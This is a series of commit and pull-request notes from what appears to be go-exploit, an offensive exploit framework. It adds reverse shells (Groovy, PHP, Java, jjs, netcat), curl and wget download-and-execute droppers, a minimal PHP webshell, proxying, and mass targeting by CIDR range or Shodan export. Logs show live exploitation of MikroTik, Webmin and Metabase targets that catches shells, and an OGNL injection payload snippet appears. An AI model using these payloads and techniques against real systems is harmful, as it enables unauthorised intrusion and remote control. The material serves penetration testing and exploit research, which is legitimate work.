random/random.go, random/random_test.go
This moves the random functions to utilize `crypto/rand` for cryptographic safe pseudo-random. These go APIs can be a little unruly since they use `math/big` and require some type coersions that aren't ideal, but shouldn't be an issue since the functions utilize `int` and not `int64` types. This adds the following functions:
- `RandPositiveInt` which generates a positive integer in half-open interval to match the other functions.
- `RandIntRange` which  generates a integer between `[min,max)`
Two other things that might come up with this; adding panics seems bad (but the `rand.Intn` utilizes these as well just internally) and this will break deterministic tests (though the current `math/rand` don't utilize seeds in the tests anyway so this may be a non-issue for now).
And for continuity …
=> Switch to crypto/rand and add int() rand functions

cli/commandline.go, docs/c2.md
-lhost and -lport are now more aligned to what they actually are (since I muddied the water with HTTPServeFile)
```
albinolobster@mournland:~/go-exploit/examples/cve-2022-44877$ ./cve-2022-44877 -h
An exploit for CentOS Web Panel CVE-2022-44877 that can generate a reverse shell or bind shell
-a	Automatically determine if the remote target uses SSL
-bport int
The port to attach the bind shell to
-c	Perform a version check before attempting exploitation
-c2 string
The C2 server implementation to use. Supported: 
SSLShellServer
SimpleShellServer
SimpleShellClient
HTTPServeFile
(default "SSLShellServer")
-e	Exploit the target
-httpServeFile.FileToServe string
The file to serve on the HTTP server
-httpServeFile.ServerField string
The value to insert in the HTTP server field (default "Apache") …
```
=> Update docs and fix wording on lhost/lport flags

protocol/httphelper.go, protocol/httphelper_test.go
The `ParseCookies` function parses an HTTP response and returns a string suitable for a `Cookie` header.
=> Add protocol.ParseCookies

cli/commandline.go, cli/commandline_test.go, config/config.go, examples/cve-2022-44877/cve-2022-44877.go, framework.go, payload/download.go
This addresses #13 and #16 by adding logic to handle `rhosts` and `rports`.  In this implementation, the user can specify a comma delimited list of hosts or ports to hit multiple targets.  The only real challenge here was reordering how c2 is started / used since a reverse shell catcher can be started once, but a bind shell connector needs to restarted over and over again. I think the logic I've introduced is fine.
An example of validating remote targets as Webmin (the output is a little clubbered together at the moment, suggestions on improvements welcome):
```sh
albinolobster@mournland:~/go-exploit/examples/cve-2019-15107$ ./cve-2019-15107 -rhosts 10.9.49.174,10.9.49.205 -rports 80,10000 -a -v
[*] Starting target 0: 10.9.49.174:80
[*] Validating the remote target is a Webmin …
```
=> Initial implementation of rhosts and rports

protocol/mikrotik/msg.go, protocol/mikrotik/webfig.go
A couple of final tweaks to support CVE-2023-30799
```
./build/cve-2023-30799_linux-arm64 -v -c -e -rhost 10.12.70.1 -lhost 10.12.70.252 -lport 1270 -user admin -password labpass1
[*] Starting listener on 10.12.70.252:1270
[*] Starting target 0: 10.12.70.1:80
[*] Validating the remote target is a MikroTik installation
[+] Target validation succeeded!
[*] Running a version check on the remote target
[*] The self-reported release is: 6.48.7
[+] The target appears to be a vulnerable version!
[*] Authenticated to a RB952Ui-5ac2nD
[*] Uploading shared object
[*] Uploading busybox
[*] Adding privileges
[*] Sending ROP chain
[*] Using gadgets for version 6.48.7
[+] Caught new shell from 10.12.70.1:48679
[+] Active shell from 10.12.70.1:48679
$ /rw/disk/busybox cat /flash/rw/logs/VERSION
ash: …
```
=> Tweaks to Support CVE-2023-30799

protocol/httphelper.go, protocol/httphelper_test.go
I found myself in a scenario where the user may or may not provide part of a URI and it was doing a really bad job adding and removing `/`. So I just created this function. Problem solved. You can do any of these:
```go
url := protocol.GenerateURL(conf.Rhost, conf.Rport, conf.SSL, protocol.BuildURI(globalEndpoint, "/app/"+webshellName))
```
```go
url := protocol.GenerateURL(conf.Rhost, conf.Rport, conf.SSL, protocol.BuildURI(globalEndpoint, "/app/", webshellName))
```
```go
url := protocol.GenerateURL(conf.Rhost, conf.Rport, conf.SSL, protocol.BuildURI(globalEndpoint, "app", webshellName))
```
=> Add Helper for Building Sane URI Path

payload/reverse.go, random/random.go, random/random_test.go
I had a use case where I was generating a filename but couldn't include the letter `x`. So I created random.RandLettersNoBadChars. Usage example:
```go
webshellName := random.RandLettersNoBadChars(8, []rune("x"))
output.PrintfStatus("Using webshell %s", webshellName)
```
Additionally, I was writing an exploit that targets installations that are largely likely to be on Debian-based systems so I figured I'd use `gjs` to establish a reverse shell. Usage example:
```go
generated = payload.ReverseShellGJSScript(conf.Lhost, conf.Lport)
```
=> Added RandLettersNoBadChars and ReverseShellGJSScript

payload/reverse.go
Found myself in a scenario where I wanted need to a reverse shell and jjs was available on the system. OpenSSL was not, so I didn't have anything in the framework that would establish an encrypted reverse shell. So I adapted the well known jjs reverse shell by Frohoff, and added TLS negotiation.
Usage:
```go
func generatePayload(conf *config.Config) (string, bool) {
generated := ""
switch conf.C2Type {
case c2.SSLShellServer:
output.PrintfStatus("Sending an SSL reverse shell payload for port %s:%d", conf.Lhost, conf.Lport)
generated = payload.ReverseShellJJSScript("bash", conf.Lhost, conf.Lport, true)
case c2.SimpleShellServer:
output.PrintfStatus("Sending a reverse shell payload for port %s:%d", conf.Lhost, conf.Lport)
generated = payload.ReverseShellJJSScript("bash", conf.Lhost, …
```
=> JJS Reverse Shell (Encrypted and Unencrypted)

cli/commandline.go, cli/commandline_test.go, config/config.go, docs/scanning.md, framework.go
Added support for defining rhosts using CIDR notation and loading rhosts from a csv (for Shodan support).
For CIDR, that looks like this:
```sh
albinolobster@mournland:~/initial-access/feed/cve-2023-38646$ ./build/cve-2023-38646_linux-arm64 -v -rhosts 192.168.1.0/24 -rport 80
[*] Starting target 0: 192.168.1.0:80
[*] Validating the remote target is a Metabase installation
[-] HTTP request error: Get "http://192.168.1.0:80/": dial tcp 192.168.1.0:80: connect: no route to host
[-] The target isn't recognized as Metabase, quitting
[*] Starting target 1: 192.168.1.1:80
[*] Validating the remote target is a Metabase installation
[-] Missing the Set-Cookie header
[-] The target isn't recognized as Metabase, quitting
[*] Starting target 2: 192.168.1.2:80
[*] Validating the remote target is a …
```
=> Defining Rhosts by CIDR or File

cli/commandline.go, framework.go, go.mod, go.sum, protocol/tcpsocket.go
Proxying with TCPConnect, TLSConnect, MixedConnect all assume a socks5:// proxy is configured. Not providing a socks5:// address will cause them to directly connect to the target.
The automatic ssl detection (`-a` on the command line) also assumes a socks5:// proxy.
Using an http or https proxy is also fine, but don't expect the above to use them properly (as they are not http/https connections).
=> Added -proxy command line option for http/https/tcp connections

c2/cli/basic.go, c2/simpleshell/simpleshellclient.go, c2/simpleshell/simpleshellserver.go, c2/sslshell/sslshellserver.go, framework.go
@wvu had noticed oddness with the openssl shell. Additionally, sending an empty command resulted in a 10 second hang. Also, the tear down code was working oddly. And somehow we had three implementations across the three shells.
NOT ANYMORE
This combines the shell logic into one spot, and removes all the old issues. I think there are probably two annoying things:
- I removed the shell prompt ('$') so you might just a blank line depending on how you establish your shell.
- To make the bindshell proxy aware, I used `TCPConnect` (which is always proxy aware). But it also logs failed connections. So you'll likely get error messages on the first couple of attempts. In an ideal world the bindshell would start until the exploit has been thrown but that plumbing doesn't exist.
=> Fixed shells. Unified code. Made bind shell proxy aware.

.golangci.yml, c2/httpservefile/httpservefile.go, c2/sslshell/sslshellserver.go, encryption/certificate.go, examples/cve-2022-44877/cve-2022-44877.go, payload/download.go, payload/download_test.go, payload/reverse.go
Addresses #20 
Broke download and exec API, but its for the best.
HTTPServer usage didn't change much. Basically there is a TLS option that defaults to false.  Usage is like so when generating a payload in exploit:
```go
generated = payload.LinuxCurlHTTPDownloadAndExecute(
conf.Lhost, conf.Lport, httpservefile.GetInstance().TLS, httpservefile.GetInstance().FileName)
```
Command line only changes if you specify TLS:
```sh
./build/cve-2023-30801_linux-arm64 -e -rhost 10.9.49.133 -lhost 10.9.49.134 -lport 8181 -httpServeFile.FileToServe ./build/reverse_shell_windows-amd64.exe -httpServeFile.TLS true
```
=> Support added for HTTPServe using TLS

c2/factory.go, c2/httpservefile/httpservefile.go, c2/httpserveshell/httpserveshell.go, payload/download.go
HTTPServeShell is (literally) a combination of HTTPServeFile and (SSLShell || SimpleShellServer). The use case is when you want to drop/execute a custom binary, but you still want to catch it in go-exploit. Example usage:
```sh
albinolobster@mournland:~/initial-access/feed/cve-2023-30801$ ./build/cve-2023-30801_linux-arm64 -e -rhost 10.9.49.133 -lhost 10.9.49.134 -lport 1270 -httpServeFile.BindAddr 10.9.49.134 -httpServeShell.SSLShell=false -httpServeFile.FileToServe ./build/reverse_shell_windows-amd64.exe -httpServeFile.TLS=true
time=2023-09-08T11:07:20.852-04:00 level=STATUS msg="Loading the provided file: ./build/reverse_shell_windows-amd64.exe"
time=2023-09-08T11:07:20.856-04:00 level=STATUS msg="Certificate not provided. Generating a TLS Certificate" …
```
=> Added httpserveshell c2

c2/factory_test.go, c2/httpservefile/httpservefile.go, c2/httpserveshell/httpserveshell.go, examples/cve-2022-44877/cve-2022-44877.go
httpservefile (and therefore httpserveshell) can now support multiple hosted files. This is useful for the case where you are exploiting a target across multiple OS/architectures.
Files will now be taken in as a comma delimited string:
```
-httpServeFile.FilesToServe ./build/reverse_shell_windows-arm64.exe,./build/reverse_shell_linux-amd64
```
The above will load two files: a windows reverse shell and a linux reverse shell. This c2 will then generate random names for the files and host them on an HTTP / HTTPS server. To interact with the files from an implementing exploit, you can fetch the filename to random name mapping using GetRandomName(). For example:
```go
httpservefile.GetInstance().GetRandomName(linux64)
```
Where linux64 is a variable that contains "reverse_shell_linux-amd64". …
=> Added support for hosting multiple files

protocol/rocketmq/remoting.go, protocol/rocketmq/remoting_test.go
See #62 
I don't see any scenario in which someone sends a full 2^32-1 makes any sense (unless it's for denial of service reasons, I guess but I'm not incredibly excited about supporting that case). I opted to just put a cap at 2^24. Which might be lazy, but I think reasonable for our use case.
=> Added an artificial cap to the size of RocketMQ messages

protocol/httphelper.go, protocol/httphelper_test.go
=> Fixed ipv6 HTTP bug. See #68

.golangci.yml, framework.go, java/javagadget.go, java/ldapjndi/ldapjndi.go
This PR enables [`dupword`](https://github.com/Abirdcfly/dupword) linter. And fixes one `dupword` issue in the comment.
=> Enable dupword linter; fix or disable found issues

payload/reverse.go, payload/reverse_test.go, protocol/httphelper.go
Added GetSetCookie value to quickly fetch new set cookie items and a mknod/nc reverse shell option. Usage examples:
```go
cookie, ok := protocol.GetSetCookieValue(resp, "asus_s_token")
if !ok {
output.PrintError("Failed to authenticate")
return "", false
}
```
and
```go
generated = payload.ReverseShellMknodNetcat(conf.Lhost, conf.Lport)
```
=> Added GetSetCookie and New Payload

transform/encode.go, transform/encode_test.go
Even if it doesn't need it. Basic use case:
```go
params := map[string]string{
param: transform.urlEncodeString("(@org.springframework.cglib.core.ReflectUtils@defineClass('" + className +
"',@org.springframework.util.Base64Utils@decodeFromString('" + encodedShell +
"'),@java.lang.Thread@currentThread().getContextClassLoader())).newInstance()"),
`label`: transform.urlEncodeString(unused+`\u0027+#request.get(\u0027.KEY_velocity.struts2.context\u0027).internalGet(\u0027ognl\u0027).findValue(#parameters.`+
param+`,{})+\u0027`),
}
```
=> Add encoding that will URL encode the entire string

payload/reverse.go
To support CVE-2023-52251. The reverse shell is unflattened here, but 
```go
output.PrintStatus("Attempting to trigger reverse shell")
payload := payload.UnflattenedClassicJava(conf.Lhost, conf.Lport)
// this payload needs to be flattened
payload = strings.ReplaceAll(payload, "\n", "")
payload = strings.ReplaceAll(payload, "\t", "")
```
Works fine
=> Added a Classic Java Reverse Shell

cli/commandline.go, protocol/httphelper.go, protocol/tcpsocket.go
See https://github.com/vulncheck-oss/go-exploit/issues/106
Before:
```sh
albinolobster@mournland:~/initial-access/feed/cve-2021-1473$ ./build/cve-2021-1473_linux-arm64 -v -rhost 8.8.8.8 -rport 5
time=2024-03-21T17:00:55.561-04:00 level=STATUS msg="Starting target" index=0 host=8.8.8.8 port=5 ssl=false "ssl auto"=false
time=2024-03-21T17:00:55.562-04:00 level=STATUS msg="Validating Cisco RV340/RV345 target" host=8.8.8.8 port=5
time=2024-03-21T17:01:05.565-04:00 level=ERROR msg="HTTP request error: Get \"http://8.8.8.8:5/\": context deadline exceeded (Client.Timeout exceeded while awaiting headers)"
time=2024-03-21T17:01:05.565-04:00 level=ERROR msg="The target isn't recognized as Cisco RV340/RV345, quitting" host=8.8.8.8 port=5 verified=false
```
After:
```sh …
```
=> Added timeout option

payload/reverse.go, payload/reverse_test.go
Example usage:
```sh
generated = payload.UnflattenedPHP(conf.Lhost, conf.Lport, "/bin/bash", true)
```
or
```
generated = payload.ShortPHPLinuxInteractive(conf.Lhost, conf.Lport)
```
=> Added PHP Reverse Shells

.golangci.yml, framework.go, protocol/httphelper.go
I overwrote the default HTTP transport when adding the adjustable timeout logic to HTTP in https://github.com/vulncheck-oss/go-exploit/commit/e331b130f41f41e117bb674d8caa2150b02e5433 - Previously, we had just been putting `InsecureSkipVerify` in default transport, but that disappeared when we overwrote the default transport.
The fix is to push `InsecureSkipVerify` into httphelpers.go. Now we aren't polluting default transport.
https://github.com/vulncheck-oss/go-exploit/issues/113
=> Moved TLSClientConfig out of Default Transport (SSL Verification Fix)

protocol/httphelper.go
Hello,
The proxy support was missed when creating a new http.Client with custom Transport{}.
Therefore the "-proxy" option had no effect on http/https connections. This PR reverts to the standard behavior of the go http client with os environ support.
=> Fix proxy support for http/https requests

framework.go
stderr should only be used for actual errors and not to describe the state of scanning / exploitation.
=> Switch Error/Warning messages to Status messages

protocol/ajp/ajp.go, protocol/ajp/ajp_test.go
To support Tomcat AJP exploitation. Example usage:
```go
_, data, ok := ajp.SendAndRecv(conf.Rhost, conf.Rport, conf.SSL, "/", "GET", []string{}, []string{})
if !ok {
return exploit.Unknown
}
version := ""
// <title>Apache Tomcat/6.0.24 - Error report</title>
// <title>Apache Tomcat/8.5.6 - Error report</title>
// <title>Apache Tomcat/7.0.29 - Error report</title>
// <title>Apache Tomcat/7.0.90</title>
// <title>Apache Tomcat/9.0.30</title>
// <h3>Apache Tomcat/8.5.50</h3>
// <h3>Apache Tomcat/8.5.42</h3>
// <h3>Apache Tomcat/9.0.27</h3>
re := regexp.MustCompile(`<(?:title|h3)>Apache Tomcat/(\d+\.\d+\.\d+)`)
res := re.FindAllStringSubmatch(data, -1)
if len(res) != 0 {
version = res[0][1]
}
```
Or more to the point (CVE-2020-1938):
```go
attributes := []string{ …
```
=> Added AJP implementation

cli/commandline.go, protocol/httphelper.go
Added a command line option for a user to define the HTTP User-Agent to use. Example usage:
```sh
albinolobster@mournland:~/test$ ./user-agent-test -v -rhost 10.9.49.70 -fll DEBUG -user-agent "hello world"
time=2024-05-03T11:30:53.451-04:00 level=DEBUG msg="Using the HTTP User-Agent: hello world"
time=2024-05-03T11:30:53.451-04:00 level=STATUS msg="Starting target" index=0 host=10.9.49.70 port=80 ssl=false "ssl auto"=false
time=2024-05-03T11:30:53.452-04:00 level=STATUS msg="Validating My Target target" host=10.9.49.70 port=80
time=2024-05-03T11:30:53.453-04:00 level=ERROR msg="Received an unexpected HTTP status code: 502"
time=2024-05-03T11:30:53.453-04:00 level=STATUS msg="The target isn't recognized as My Target, quitting" host=10.9.49.70 port=80 verified=false
```
Results in:
And you …
=> #122 Allow user defined HTTP User-Agent

framework.go
Documents that flag.Parse() is handled by RunProgram in order to make it clear that you can define flags prior to this call and that handling them manually is unnecessary.
=> Clarify that flag.Parse() is ran internally

README.md
Went through the docs and realized that he payload changes in #139 make the README point to a non-existent file. This clarifies and fixes that.
=> Docs: Update README to match new Payload links

c2/httpservefile/httpservefile.go, c2/httpserveshell/httpserveshell.go, payload/bindshell/bindshell.go, payload/bindshell/netcat.go, payload/dropper/dropper.go, payload/dropper/dropper_test.go, payload/dropper/groovy.go, payload/encode.go, payload/encode_test.go, payload/fileplant/cron.go, payload/fileplant/fileplant_test.go, payload/reverse/bash.go, payload/reverse/groovy.go, payload/reverse/java.go, payload/reverse/netcat.go, payload/reverse/openssl.go, payload/reverse/reverse.go, payload/reverse/reverse_test.go, payload/reverse/telnet.go, payload/wrapper.go, payload/wrapper_test.go
Added some Groovy functionality I wanted for CVE-2024-27348. Specifically, I wanted a simple reverse shell in Groovy, to be used like:
```go
case c2.SimpleShellServer:
output.PrintfStatus("Creating a reverse shell payload for port %s:%d", conf.Lhost, conf.Lport)
generated = reverse.Groovy.GroovyClassic(conf.Lhost, conf.Lport)
```
I also wanted a binary dropper so that I can drop a payload and execute it straight from Groovy. To be used like:
```go
case c2.HTTPServeShell:
output.PrintfStatus("Creating dropper payload for port %s:%d", conf.Lhost, conf.Lport)
outputFile := "/tmp/" + random.RandLetters(8)
generated = dropper.Groovy.GroovyHTTP(httpservefile.GetInstance().HTTPAddr, httpservefile.GetInstance().HTTPPort, httpservefile.GetInstance().GetRandomName(""), outputFile)
```
Finally, I …
=> Added a Groovy reverse shell, dropper, and wrapper

payload/reverse/php.go, payload/reverse/reverse_test.go
Fixes #157 
select is apparently problematic on Windows, and fgets behavior was bad (at least when it encountered Japanese). Basically rewrote this to account for the different windows behavior (influenced by https://raw.githubusercontent.com/ivan-sincek/php-reverse-shell/master/src/reverse/php_reverse_shell.php), and since I was in there I figured I'd autodetect the target/shell since that's hugely beneficial (but does break the API... sorry!).
Tested on Linux (php7) and Windows (php8)... both Japanese and English locales :rofl:
=> Fix reverse.PHP.Unflattened on Windows. Autodetect OS.

c2/httpservefile/httpservefile.go, c2/sslshell/sslshellserver.go, payload/dropper/dropper.go, payload/dropper/dropper_test.go, payload/dropper/groovy.go, payload/dropper/php.go, payload/reverse/php.go, payload/wrapper.go, payload/wrapper_test.go
This pull:
- Fixes #169 
Adds:
- PHP Wrapper #163 
- PHP Dropper #162 
Breaks API for:
- dropper.Groovy.GroovyHTTP: I changed this to dropper.Groovy.HTTP so it wasn't repeating itself.
Potential Side Affects:
- Our PHP was assuming short tags were enabled so I flipped the relevant ones to use `<?php`
=> Updates to improve handling of PHP CVE-2024-4577

framework.go
In order to encourage folks to use multiple payload types (and to remind myself), I propose adding the payload generate function that is widely used by default.
This could be cleaned up if anyone (@wvu) has thoughts.
=> Updated example to contain multiple payload types

.golangci.yml, framework.go, payload/wrapper.go
See #181 - this is a simple solution to just update GODEBUG. We won't update it if tlsrsakex is already set, but otherwise we will attempt to append tlsrsakex=1 to GODEBUG
=> Fix disabled ciphers and clean up linting complaints

protocol/httphelper.go
I noticed this when working on integrating Shodan data. Basically, Shodan leaves the transfer-encoding chunked header, but removes the chunked values from the body. When Go attempts to read in the body, it fails. While I've accounted for this in our Shodan processor, I figured it was smart to account for it here too.
=> Only return cached item if body read was successful

product/product.go, product/wordpress/plugins.go, product/wordpress/wordpress.go, protocol/httphelper.go, protocol/httphelper_test.go
Currently `go-exploit` does not have any public product specific handling, but I've had to write a few WordPress plugin RCEs lately and was getting tired of reinventing the wheel.
This lays the groundwork to have product specific functions and handling. This also only implements: authentication, nonce selection, and plugin upload based RCE.
In the future I had a few thoughts that we could potentially add:
- `flag` handling for each product specific implementation allowing a `wordpress.Flags()` call so that the CLI flags can automatically inherit any product specific flags in the future.
- Offer per-product specific selection of payloads (related to above) so that you could potentially modify the exploitation path further.
=> Add the "product" and "product/wordpress" structure

cli/commandline.go, config/config.go, docs/getting-started.md, framework.go
This change introduces two new config.go functions:
1. NewRemoteExploit
2. NewLocalExploit
Additionally, it flags these old config.go functions as deprecated (and someday in the nearish future, they will simply be removed):
1. New
2. NewLocal
For those not familiar with the framework, these are core functions that *every* exploit calls in main. Using a public example, we can see that [this Confluence bug](https://github.com/vulncheck-oss/cve-2023-22527/blob/8275307ec52e8183354d85159b45fc3a4ded28ea/reverseshell/cve-2023-22527.go#L159) has a main like:
```go
func main() {
supportedC2 := []c2.Impl{
c2.SimpleShellServer,
}
conf := config.New(config.CodeExecution, supportedC2, "Confluence", "CVE-2023-22527", 8090)
```
But will need to be updated to something like:
```go
func main() { …
```
=> #210 Improve go-exploit self-documentation using new conf functions

c2/factory_test.go, c2/httpservefile/httpservefile.go
We have a bunch of exploits that spin up an HTTP server *in the exploit* in order to serve some type of payload or file for exploitation. However, go-exploit has HTTP server logic built-in that supports HTTPS, automatically randomizing names, and changing the server banner. So it makes sense to just use HTTPServeFile in that case. So that's what I did for my CVE-2024-45507 implementation (and asked @j-shomo to do the same in his upcoming exploit).
The one downside is that HTTPServeFile expected at least one file to be provided by the command line to be read from disk. In this pull, I removed that requirement. Additionally, I added `AddFile` so users could easily call that and have whatever hosted.
The diff to use this with our CVE-2024-45507 looks like:
```
diff --git …
```
=> Update HTTPServeFile to Accept Files Programmatically

cli/commandline.go
I believe you ran into this too, @terrorbyte. Can you give this a test to ensure it resolves the issue?
e.g. This should fix the following ERROR message.
```
vulncheck@63960dc2030f:~$ ./xploit -v -c -e -o
time=2024-09-25T16:34:11.877Z level=ERROR msg="The c2 you selected is not supported by this exploit."
time=2024-09-25T16:34:11.878Z level=STATUS msg="Validating Sudo Project Sudo target" host="" port=0
```
=> Fix error message when using -o with local or file-based exploits

framework.go
Currently the bind shells will lookup the target for calling out based on `-lhost` which is empty in most expected configurations. This reverts it back to using the same `-rhost` target and the original behavior. Blame says it was on the C2 changes that I broke this, so I suspect bind shells have been slightly broken for a bit.
=> Fix bind shell to use -rhost

payload/dropper/unix.go
This small wget payload is useful when a command injection has limited space but you want the flexibility of executing longer commands. It's intended to be used to HTTPServeShell like this:
```golang
case c2.HTTPServeShell:
// pipe a bash script straight to bash via wget
generated = dropper.Unix.WgetHTTP(httpservefile.GetInstance().HTTPAddr,
httpservefile.GetInstance().HTTPPort, httpservefile.GetInstance().TLS,
httpservefile.GetInstance().GetRandomName(""))
```
=> add small wget to bash exec payload

java/javaclass.go, payload/webshell/php.go, payload/webshell/webshell.go, payload/webshell/webshell_test.go
I used this with CVE-2024-9441:
```
albinolobster@mournland:~/initial-access/feed/cve-2024-9441$ ./build/cve-2024-9441_linux-arm64 -e -rhost 10.9.49.18 -rport 80
time=2024-10-03T12:55:46.110-04:00 level=STATUS msg="Starting target" index=0 host=10.9.49.18 port=80 ssl=false "ssl auto"=false
time=2024-10-03T12:55:46.110-04:00 level=STATUS msg="Attempting to upload the webshell to img/index.html"
time=2024-10-03T12:55:47.303-04:00 level=STATUS msg="Testing if the webshell was uploaded to http://10.9.49.18:80/img/index.html"
time=2024-10-03T12:55:48.204-04:00 level=SUCCESS msg="Minimal webshell dropped to http://10.9.49.18:80/img/index.html"
time=2024-10-03T12:55:48.206-04:00 level=SUCCESS msg="Example usage: curl -kv http://10.9.49.18:80/img/index.html?0=id" …
```
=> Added an extremely minimal PHP GET webshell

java/javaclass.go, payload/webshell/php.go, payload/webshell/webshell_test.go
At @terrorbyte's suggestion, added a loose scheme to ensure that randos can't use the webshell. Usage is basically the same except the parameter to use is also spit out. E.g. Usage example:
```go
webshellPayload, cmdParam := webshell.PHP.MinimalGet()
```
Downstream that looks like:
```go
url = protocol.GenerateURL(conf.Rhost, conf.Rport, conf.SSL, "/"+webshellName)
output.PrintfSuccess("Minimal webshell dropped to %s", url)
output.PrintfSuccess("Example usage: curl -kv %s?%s=id", url, cmdParam)
```
=> Randomize the parameter used in the minimal webshell

cli/commandline.go, config/config.go, config/config_test.go
Currently, one of our stated goals it to make interoperability with other software easy. One thing that breaks that is when an exploit defines command line parameters that aren't generally well known. What I *don't* mean is like "lhost", "rhost", "proxy", etc. Those are all well known and easily mapped out to specific exploit types.
I'm talking about this scenario. Consider our implementation for CVE-2024-45507:
```go
func main() {
httpServer := httpservefile.GetInstance()
httpServer.CreateFlags()
flag.StringVar(&httpServer.HTTPAddr, "httpAddr", "", "The address the HTTP server should bind to")
flag.IntVar(&httpServer.HTTPPort, "httpPort", 8080, "The port the HTTP server should bind to")
flag.StringVar(&globalHostname, "hostname", "localhost", "Hostname to use if not provided using rhost …
```
=> Added Logic to Report Custom Exploit Flags
